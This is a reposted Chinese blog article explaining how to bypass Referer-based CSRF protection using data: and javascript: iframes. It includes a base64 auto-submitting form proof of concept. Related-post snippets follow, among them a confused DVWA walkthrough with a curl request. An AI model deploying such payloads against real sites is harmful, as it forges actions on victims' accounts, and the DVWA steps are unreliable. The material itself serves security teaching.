CSRF - 空Referer绕过

最新推荐文章于 2025-03-02 13:57:20 发布
转载 最新推荐文章于 2025-03-02 13:57:20 发布 · 312 阅读 · 0
文章标签:

#javascript #ViewUI

本文介绍了如何在存在空Referer请求的情况下构造跨站请求伪造(CSRF)攻击的POC。通过使用特定协议,如data: 和javascript:,可以在不需要用户交互的情况下自动提交表单,从而对存在漏洞的服务器发起攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在实际环境中,服务器很多CGI由于一些历史原因,必须允许空Referer的请求。比如:老的客户端版本请求的时候就没有Referer,总不能在服务端一刀切,让老版本的用户都无法正常使用了吧。

这样的CGI就存在CSRF攻击的风险。那么我们该如何在真实环境中构造一个可利用的POC呢?

我们知道正常的页面跳转,浏览器都会自动带上Referer,那么现在的问题就变成了什么情况下浏览器会不带Referer?通过一些资料,可以大致总结为两种情况:

1.通过地址栏,手动输入;从书签里面选择;通过实现设定好的手势。上面说的这三种都是用户自己去操作,因此不算CSRF。

2.跨协议间提交请求。常见的协议:ftp://,http://,https://,file://,javascript:,data:.最简单的情况就是我们在本地打开一个HTML页面,这个时候浏览器地址栏是file://开头的,如果这个HTML页面向任何http站点提交请求的话,这些请求的Referer都是空的。那么我们接下来可以利用data:协议来构造一个自动提交的CSRF攻击。当然这个协议是IE不支持的,我们可以换用javascript:

假如http://a.b.com/d 这个接口存在空Referer绕过的CSRF,那么我们的POC可以是这样的:

<html>
    <body>
       <iframe src="data:text/html;base64,PGZvcm0gbWV0aG9kPXBvc3QgYWN0aW9uPWh0dHA6Ly9hLmIuY29tL2Q+PGlucHV0IHR5cGU9dGV4dCBuYW1lPSdpZCcgdmFsdWU9JzEyMycvPjwvZm9ybT48c2NyaXB0PmRvY3VtZW50LmZvcm1zWzBdLnN1Ym1pdCgpOzwvc2NyaXB0Pg==">
    </doby> 
</html>

  

上面iframe的src的代码其实是:

<form method=post action=http://a.b.com/d><input type=text name='id' value='123'/></form><script>document.forms[0].submit();</script>

  

自动提交表单到有缺陷的CGI.

刚才说了上面的POC对IE支持不好,那么我们可以用javascript:协议来实现一个类似的,大致思路是这样的,具体构造代码我不弄了:

<iframe id="a" src=""></iframe> 
<script>
    document.getElementById("a").src='javascript:"<html><body>wooyun.org<scr'+'ipt>eval(xx)</scr'+'ipt></body></html>"';
</script>

  

【网络安全 | 漏洞挖掘】绕过Referer实现CSRF
等风来
08-28 2555
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种攻击方式,其中攻击者诱使用户在已登录的情况下执行不安全的操作。例如,攻击者可能诱导用户访问一个恶意网站B,B网站上可能会发送伪造的请求到用户已经登录的A网站,从而执行一些未经授权的操作,比如从A网站转账给hacker。这个时候,请求是由B网站发送至A网站的。为了防御CSRF,即确保A网站的服务器只处理来自于一个合法的、可信的来源,Referer就产生了。Referer 是 HTTP 请求头中的一个字段,表示用户当前页面的来源
CSRF绕过
墨痕诉清风的博客
06-20 442
1. 替换referer为url,如果header已有则不替换,例172.16.12.129为url,查看返回值是否包含cookie,cookie中存在SameSite字段,包含则表示SameSite标志cookie检测到了。3. 替换referer为主机外的地址,有cookie再次请求,查看返回值是否包含cookie,cookie中存在SameSite字段,包含则表示SameSite标志cookie检测到了。3. 删除整个token,尝试请求查看返回状态码,200、300则起作用,否则篡改无效。
CSRF   花式绕过Referer技巧
weixin_34266504的博客
02-03 607
做项目遇到Referer绕过的情况 有同事问起 这几天不是很忙 就把自己知道的方法记录下。有条件限制 不一定所有的Refere验证就可以绕过1.Refere为条件下解决方案: 利用ftp://,http://,https://,file://,javascript:,data:这个时候浏览器地址栏是file://开头的,如果这个HTML页面向任何http站点提交请求的...
csrf绕过Referer技巧
一米八多的瑞兹的博客
12-22 1715
1. Referer防御CSRF原理 HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器我是从哪个页面链接过来的,服务器基此可以获得一些信息用于处理。当用户点击被构造好的CSRF利用页面,那么在执行用户对应操作时,提交的HTTP请求中就有对应的Referer值,此时服务端判断Referer值是否与服务器的域名信息有关。如果不相关则不执行操作。 2. Referer防御代码编写 在PHP中使用 $_SERVER[‘HTTP_REFERER
CSRF--花式绕过Referer技巧
11-25 341
CSRF遇到Referer绕过的情况,有条件限制,不一定所有的Refere验证就可以绕过 1.Refere为条件下 解决方案: 利用ftp://,http://,https://,file://,javascript:,data:这个时候浏览器地址栏是file://开头的,如果这个HTML页面向任何http站点提交请求的话,这些请求的Referer都是的。 例...
CSRF绕过后端Referer校验
深蓝旭的博客
08-15 1585
CSRF绕过后端Referer校验分正常情况和不正常的情况,我们这里主要讨论开发在写校验referer程序时,不正常的情况下怎么进行绕过。 正常情况 正常的情况指服务器端校验Referer的代码没毛病,那么意味着前端是无法绕过的。 我之前考虑过的方案: JS修改Referer,失败; 让用户点击第三方网站,但是浏览器就是使用第三方网站的referer,失败; 不正常的情况 不正常的情况指服务器端校验Referer的代码有漏洞,前端才能做到绕过,下面介绍几个可能会绕过Referer的案例; 添加无R...
csrf绕过Referer技巧-01
09-15
CSRF绕过Referer技巧详解 CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的Web攻击方式,攻击者可以通过构造恶意页面诱骗用户执行非法操作。为了防御CSRF攻击,Web开发者通常会使用Referer头来判断...
CSRF学习以及一些绕过referer的方法
不想当脚本小子的脚本小子
01-23 2661
跨站请求伪造,原理:——两个关键点:跨站点的请求以及请求是伪造的 攻击者盗用了用户的身份,以用户的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作 1. 用户C打开浏览器,访问受信任网站A,输入用户名和密码请求登录网站A; 2.在用户信息通过验证后,网站A产生Cookie信息并返回给浏览器,此时用户登录网站A成功,可以正常发送请求到网站A; 3. 用户未退出网站A之前,在同一浏览器中,打开一个TAB页访问网站B; 4. 网站B接收到用户请求后,返回一些攻击性代
35-1 CSRF漏洞 - CSRF绕过
weixin_43263566的博客
04-09 362
利用 Burp Suite 的 CSRF(跨站请求伪造)token 插件进行自动更新 token:在这种情况下,攻击者利用 Burp Suite 的 CSRF token 插件来自动获取和更新 token。通过 XSS(跨站脚本攻击)获取当前页面的 token,并构造恶意链接:在这种情况下,攻击者利用已存在的 XSS 漏洞,注入恶意脚本来获取用户的 token。这是因为有token校验的原因,使用插件自动更新请求中的 token。这里的名称要跟请求中的token名称一致不然插件找不到要改的参数。
DVWA靶场 CSRF 对于referer字段绕过问题
最新发布
2301_76913435的博客
03-02 479
在dvwa靶场medium难度下的CSRF中,要求绕过referer字段才能进行CSRF注入,这里提供的思路是在带payload的网页上加一层以server_name命名的目录,从而绕过referer的检测。这里给出源码关键的部分,这里stripos函数是在$_SERVER[ 'HTTP_REFERER' ]中找到$_SERVER[ 'SERVER_NAME' ]的索引位置,如果找不到则返回false。这里的Referer字段并不是我们想的http://bank.com/localhost。
CSRF攻击(2), 绕过Referer防御
探测???
11-02 1014
这里可以看到 Referer 中由于包含了文件名, 所以就间接包含有目标服务器的ip, 绕过了后端对 SERVER_NAME 的判断, 密码修改成功.这里看到表单类型的链接, 点击后 Referer 只包含攻击者的ip, 并没有目标ip, 因此被防御.策略,这将导致浏览器在Referer头中发送完整的URL,为了避免出现这种情况, 可以在HTML文件中使用。当使用一个普通的表单类型的钓鱼链接时, 比如。, 浏览器会根据这个策略发送Referer头.标签会指示浏览器在发送请求时使用。
【安全】P 5-5 CSRF绕过Referer技巧
Z_David_Z的博客
02-23 516
目录0X01 Referer防御CSRF原理0X02 Referer防御代码编写0X03 绕过Referer技巧0X04 Burpsuite自动生成POC 0X01 Referer防御CSRF原理 HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器我是从哪个页面链接过来的,服务器基此可以获得一些信息用于处理。 当用户点击被构造好的CSRF利用页面,那么在执行用户对应操作时,提交的HTTP请求中就有对应的Referer值,此时服务端判断R
【10.15总结】绕过CSRFReferer保护
weixin_30449453的博客
10-15 415
今天下午可能要出远门,所以现在就把总结写好了。 Write-up地址:[Critical] Bypass CSRF protection on IBM 这个CSRF漏洞存在于IBM的修改邮箱页面,修改邮箱的地址是 https://www.ibm.com/ibmweb/myibm/account/sendmail?locale=us-en&email=NEW_EMAIL 所...
CSRF实战案例—绕过referer值验证
渗透之路,攻防之间皆学问
12-21 4018
在一个添加管理员的界面引起了我的注意
绕过Referer和Host检查
weixin_34226182的博客
05-07 660
1、我们在尝试抓取其他网站的数据接口时,某些接口需要经过请求头中的Host和Referer的检查,不是指定的host或referer将不予返回数据,且前端无法绕过这种检查 此时通过后端代理解决 在vue-cli 环境下,以qq音乐为例伪造请求头:   1.1 打开配置文件webpack.dev.conf,js,安装express,axios 并在文件开头const portfinde...
【同程——CSRF绕过Referer限制实现CSRF
Fly_鹏程万里
12-20 2313
主要是能绕过Referer限制,如果有任何member站的csrf都可以利用,我就随便找了一个修改用户名的 原本的请求: 发现可以用GET来发送 但是提示不要再其他页面请求,发现是判断了ref,通过修改ref为: 就绕过了限制,写了一个demo http://member.ly.com.0x7.pw/c.php 访问之后等待1秒,然后再看你的用户名就变成了 test by ...
CSRF防范及绕过
weixin_67289581的博客
10-29 489
检测referer字段例如:一旦没检测到referer头或域名不对就直接放弃处理包的请求所以绕过只能结合xss、文件上传html绕过
CSRF漏洞
qq_41048303的博客
03-04 1009
CSRF漏洞 1.如何测试csrf漏洞 对目标站点增删改查的地方进行标记,并观察逻辑,判断请求是否可以伪造 # 手工测试 若本次操作中存在csrf token参数,或存在验证码等防御行为,则不存在csrf漏洞。若将数据包中的referer字段去掉,或仅仅删除referer字段的值,重新发送得到服务器的正确受理,那么可认为存在csrf漏洞。 2.攻击流程 # 受害者登录了目标网站 # 攻击者向受害者发送恶意链接 # 受害者点击链接, 链接中的js代码执行, 向目标网站发送某个请求 # 由于用户已登录,
复现关于dvwa的CSRF-token绕过实验
05-05
首先,我们需要在本地搭建一个DVWA环境。DVWA是一个漏洞练习平台,可以用于学习和测试Web应用程序的安全性。您可以从以下网站下载DVWA并进行安装:https://github.com/ethicalhack3r/DVWA。 接下来,我们需要绕过CSRF-token进行攻击。CSRF-token是一种防止CSRF攻击的措施,它是一个随机生成的字符串,用于验证请求是否来自合法的来源。在DVWA中,我们可以通过修改一个cookie来绕过CSRF-token。 下面是具体的攻击步骤: 1. 打开DVWA,登录并进入CSRF实验页面。 2. 在Chrome浏览器中打开开发者工具,切换到“Network”选项卡,勾选“Preserve log”选项。 3. 在实验页面中点击“View Source”按钮,查看页面源代码。 4. 在源代码中找到与CSRF-token相关的代码,我们可以看到以下代码: ``` <input type="hidden" name="user_token" value="<?php echo $_SESSION['user_token']; ?>"> ``` 5. 复制CSRF-token,它通常位于name="user_token"的input标签中,value属性的值为一个长字符串。 6. 在开发者工具中找到与此页面对应的请求,点击它打开请求详情。 7. 在请求详情中找到Cookie选项卡,找到名为“PHPSESSID”的cookie并复制它的值。 8. 使用一个新的浏览器标签打开一个在线表单生成器,例如:https://www.123formbuilder.com/free-form-templates/Online-Order-Form-3578911/。 9. 在表单生成器中创建一个POST表单,将请求方法设置为POST,并填写以下表单字段: ``` action: http://your-dvwa-site.com/vulnerabilities/csrf/ amount: 1000 ``` 10. 在开发者工具中找到此页面对应的请求,复制请求头中的所有内容。 11. 使用curl或其他工具发送POST请求,将以上内容作为请求头发送,例如: ``` curl -X POST 'http://your-dvwa-site.com/vulnerabilities/csrf/' \ -H 'Cookie: PHPSESSID=your-session-id-here' \ -H 'Content-Type: application/x-www-form-urlencoded' \ -H 'Referer: http://your-dvwa-site.com/vulnerabilities/csrf/' \ -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36' \ -H 'Upgrade-Insecure-Requests: 1' \ -H 'Origin: http://your-dvwa-site.com' \ -H 'Accept-Encoding: gzip, deflate' \ -H 'Accept-Language: en-US,en;q=0.9' \ -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' \ --data 'user_token=your-csrf-token-here&amount=1000&action=transfer' ``` 12. 您应该会看到成功的响应。 总之,这个实验展示了CSRF攻击的危害性以及如何绕过CSRF-token进行攻击。在实际应用中,我们应该采取更加安全的措施来防止CSRF攻击,例如使用双重身份验证或者更加严格的CSRF-token验证。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值